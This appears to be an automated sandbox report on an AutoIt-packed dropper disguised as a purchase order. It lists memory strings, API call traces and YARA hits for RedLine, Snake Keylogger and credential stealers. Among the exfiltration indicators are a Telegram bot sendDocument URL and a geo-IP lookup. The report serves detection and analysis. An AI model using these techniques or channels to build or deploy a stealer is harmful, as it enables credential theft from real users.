Source: powershell.exe, 00000010.00000002.2246819288.0000000007583000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2262728885.0000000008452000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: RegSvcs.exe, 00000018.00000002.2277102302.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Grinnellia.exe, 00000016.00000002.2249712826.0000000000B18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pywolwnvd.biz/
Source: server01.exe, 0000000F.00000002.3330930022.00000000031AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: server01.exe, 0000000F.00000002.3330930022.00000000031AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: server01.exe, 0000000F.00000002.3330930022.0000000003111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2197639351.0000000004B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: alg.exe, 00000003.00000003.3026352524.0000000001440000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.3011197647.0000000001440000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/
Source: alg.exe, 00000003.00000003.3026882137.0000000001440000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.3011446827.0000000001440000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/8
Source: alg.exe, 00000003.00000003.2360118722.0000000001570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: powershell.exe, 00000010.00000002.2197639351.0000000004B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBjq
Source: RegSvcs.exe, 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: alg.exe, 00000003.00000003.2874426747.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: setup.exe1.3.dr	String found in binary or memory: https://clients2.google.com/cr/report
Source: alg.exe, 00000003.00000003.2404059376.0000000001570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: alg.exe, 00000003.00000003.2404646007.0000000001570000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2404981914.0000000001570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: alg.exe, 00000003.00000003.2874497887.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: setup.exe1.3.dr	String found in binary or memory: https://crashpad.chromium.org/
Source: setup.exe1.3.dr	String found in binary or memory: https://crashpad.chromium.org/bug/new
Source: setup.exe1.3.dr	String found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
Source: powershell.exe, 00000010.00000002.2197639351.0000000004C95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: alg.exe, 00000003.00000003.2874567280.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: alg.exe, 00000003.00000003.2874567280.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
Source: alg.exe, 00000003.00000003.2874231233.0000000001450000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: powershell.exe, 00000010.00000002.2233264832.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75d
Source: server01.exe, 0000000F.00000002.3330930022.000000000318E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75l
Source: setup.exe1.3.dr	String found in binary or memory: https://support.google.com/chrome/?p=usage_stats_crash_reports
Source: setup.exe1.3.dr	String found in binary or memory: https://support.google.com/chrome?p=chrome_uninstall_surveymicrosoft-edge:open..
Source: alg.exe, 00000003.00000003.3070682412.0000000001440000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/8

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_00456B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00456B0C

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_00456D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00456D07

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

0_2_00456B0C

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_00442B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00442B37

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0046F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0046F7FF

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.Grinnellia.exe.48a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.RegSvcs.exe.3d24dc0.10.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.RegSvcs.exe.3d54e10.14.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.Grinnellia.exe.48a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 22.2.Grinnellia.exe.4090000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.RegSvcs.exe.3d54e10.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.0.server01.exe.e40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.RegSvcs.exe.3d3cdf0.12.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.RegSvcs.exe.3d3cdf0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 13.2.RegSvcs.exe.3d24dc0.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000B.00000002.2130937070.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000F.00000000.2131836029.0000000000E42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.2100925791.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000D.00000002.2133035996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000016.00000002.2263738666.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000D.00000002.2139311354.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 3252, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: server01.exe PID: 4324, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00403D19
Source: PO #09465610_GQ 003745_SO-242000846.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000000.2050804216.00000000004AE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_04b9153f-b
Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000000.2050804216.00000000004AE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_edd32d31-6
Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2069359739.000000000414D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3eb42a62-7
Source: PO #09465610_GQ 003745_SO-242000846.exe, 00000000.00000003.2069359739.000000000414D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c365588c-c
Source: Grinnellia.exe, 00000008.00000000.2070051988.00000000004AE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3de340c9-e
Source: Grinnellia.exe, 00000008.00000000.2070051988.00000000004AE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_0783fee8-4
Source: Grinnellia.exe, 0000000B.00000000.2096012714.00000000004AE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2bda5fce-a
Source: Grinnellia.exe, 0000000B.00000000.2096012714.00000000004AE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_31be2241-2
Source: Grinnellia.exe, 00000016.00000002.2247421636.00000000004AE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_be3efd0b-5
Source: Grinnellia.exe, 00000016.00000002.2247421636.00000000004AE000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_331c8108-d
Source: PO #09465610_GQ 003745_SO-242000846.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d396653d-f
Source: PO #09465610_GQ 003745_SO-242000846.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_8ec60ef9-5

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

File dump: apihost.exe.14.dr 665670656

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_00446606: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00446606

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_0043ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_0043ACC5

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe

Code function: 0_2_004479D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004479D3

Source: C:\Windows\System32\alg.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\90fdfad63d8f4c72.bin

Jump to behavior

Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0040E3E3	0_2_0040E3E3
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0042B043	0_2_0042B043
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00413200	0_2_00413200
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0043410F	0_2_0043410F
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_004202A4	0_2_004202A4
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0043038E	0_2_0043038E
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0043467F	0_2_0043467F
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_004206D9	0_2_004206D9
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0046AACE	0_2_0046AACE
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00434BEF	0_2_00434BEF
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0042CCC1	0_2_0042CCC1
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0040AF50	0_2_0040AF50
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00406F07	0_2_00406F07
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0041B11F	0_2_0041B11F
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_004631BC	0_2_004631BC
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0042D1B9	0_2_0042D1B9
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0043724D	0_2_0043724D
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0042123A	0_2_0042123A
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_004413CA	0_2_004413CA
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_004093F0	0_2_004093F0
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0041F563	0_2_0041F563
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_004096C0	0_2_004096C0
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0044B6CC	0_2_0044B6CC
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0046F7FF	0_2_0046F7FF
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_004077B0	0_2_004077B0
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_004379C9	0_2_004379C9
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0041FA57	0_2_0041FA57
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00409B60	0_2_00409B60
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00413B70	0_2_00413B70
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00407D19	0_2_00407D19
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_0041FE6F	0_2_0041FE6F
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00429ED0	0_2_00429ED0
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00407FA3	0_2_00407FA3
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AF00D9	0_2_00AF00D9
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AB6EAF	0_2_00AB6EAF
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AB51EE	0_2_00AB51EE
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AED580	0_2_00AED580
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AE3780	0_2_00AE3780
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AEC7F0	0_2_00AEC7F0
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AF39A3	0_2_00AF39A3
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AE5980	0_2_00AE5980
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AB7B71	0_2_00AB7B71
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00AB7F80	0_2_00AB7F80
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00C100B0	0_2_00C100B0
Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe	Code function: 0_2_00C14618	0_2_00C14618
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_0075A810	7_2_0075A810
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00737C00	7_2_00737C00
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00762D40	7_2_00762D40
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_007379F0	7_2_007379F0
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_0075EEB0	7_2_0075EEB0
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_007592A0	7_2_007592A0
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_007593B0	7_2_007593B0
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_00B4C648	8_2_00B4C648
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_02BC39A3	8_2_02BC39A3
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_02B86EAF	8_2_02B86EAF
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_02BB5980	8_2_02BB5980
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_02B851EE	8_2_02B851EE
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_02B87F80	8_2_02B87F80
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_02BB3780	8_2_02BB3780
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_02BBC7F0	8_2_02BBC7F0
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 8_2_02BBD580	8_2_02BBD580
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 10_2_009BA810	10_2_009BA810
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 10_2_00997C00	10_2_00997C00
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 10_2_009979F0	10_2_009979F0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 10_2_009C2D40	10_2_009C2D40
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 10_2_009BEEB0	10_2_009BEEB0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 10_2_009B92A0	10_2_009B92A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 10_2_009B93B0	10_2_009B93B0
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_00A139A3	11_2_00A139A3
Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe	Code function: 11_2_00A05980	11_2_00A05980
